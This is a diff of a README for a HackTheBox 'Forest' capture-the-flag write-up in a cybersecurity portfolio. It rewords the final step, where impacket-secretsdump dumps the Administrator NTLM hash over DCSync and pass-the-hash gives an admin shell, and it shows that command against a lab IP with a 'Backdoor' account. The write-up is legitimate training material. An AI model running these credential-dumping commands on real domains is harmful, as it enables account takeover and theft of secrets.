Hussam-creator/cybersecurity-portfolio/Writeups/HackTheBox/Forest/README.md

 ![dcsync](Images/dcsync.png)

-Finally, the `impacket-secretsdump` tool was executed to retrieve the domain hashes and the `pass-the-hash` technique was used to bypass authentication methods and obtain a privileged shell as the Administrator.
+Finally, the `impacket-secretsdump` tool was executed to retrieve the NTLM hash of the `Administrator` account and the `pass-the-hash` technique was used to bypass authentication methods and obtain a privileged shell as the Administrator.
 ```
 impacket-secretsdump -just-dc-user Administrator htb/Backdoor:"Password1"@10.129.95.210
 ```